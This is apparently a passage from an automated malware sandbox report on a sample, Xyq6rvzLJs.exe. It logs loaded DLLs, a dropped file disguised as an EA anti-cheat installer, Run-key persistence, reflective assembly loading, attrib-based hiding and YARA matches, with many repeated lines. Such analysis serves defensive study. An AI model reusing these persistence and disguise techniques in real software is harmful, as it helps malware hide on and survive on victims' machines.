                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Xyq6rvzLJs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Xyq6rvzLJs.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: Xyq6rvzLJs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: Xyq6rvzLJs.exe, MessageRead.cs.Net Code: RecoveryData System.Reflection.Assembly.Load(byte[])
                  Source: $77EAAntiCheat.Installler.exe.0.dr, MessageRead.cs.Net Code: RecoveryData System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeCode function: 12_2_00007FF848E700BD pushad ; iretd 12_2_00007FF848E700C1

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: attrib.exe
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: attrib.exe
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeFile created: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77EAAntiCheat.Installler.exe.logJump to behavior

                  Boot Survival

                  barindex
                  Source: Yara matchFile source: Xyq6rvzLJs.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Xyq6rvzLJs.exe.620000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Xyq6rvzLJs.exe.3f77ae8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Xyq6rvzLJs.exe.3f77ae8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2077667438.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.2051314011.0000000000622000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Xyq6rvzLJs.exe PID: 2764, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe, type: DROPPED
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77EAAntiCheat.Installler.exe
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
